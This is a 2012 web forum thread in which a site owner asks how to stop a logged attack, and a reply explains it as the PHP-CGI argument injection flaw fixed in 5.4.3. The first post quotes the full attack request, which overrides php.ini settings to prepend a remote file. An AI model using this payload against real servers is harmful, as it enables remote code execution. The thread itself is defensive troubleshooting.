astralaaron Posted June 15, 2012 Share Posted June 15, 2012 I have recently cleared malicious code and htaccess files off of a couple of my websites and changed the passwords. Since then I have been watching my access logs and I can see routinely there is someone trying to run commands like this: "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F000.000.000.000%2Finfo3.txt i removed the IP address that was in the link they are trying to use in the auto_prepend_file option because I got a virus when I tried connecting to it from my computer. my question is simply is there an easy way to disable the -d 'switches' they are trying to use to override the php.ini settings? if not, would making a function to run the $_GET array through to check for a pattern match be an effective way of stopping those settings from being used? from what I understand the auto_prepend_file is a file that runs before the page loads. any advice is appreciated. Link to comment Share on other sites More sharing options...
justsomeguy Posted June 15, 2012 Share Posted June 15, 2012 It looks like that vulnerability is fixed in 5.4.3, and from what I can tell it only affects the CGI version. If you're running PHP as an Apache module that shouldn't be an issue. Otherwise, there's a solution regarding htaccess here: https://bugs.php.net/bug.php?id=61910 Link to comment Share on other sites More sharing options...
astralaaron Posted June 16, 2012 Author Share Posted June 16, 2012 (edited) Thank you for clearing that up, php is running as an Apache module. Edited June 16, 2012 by astralaaron Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now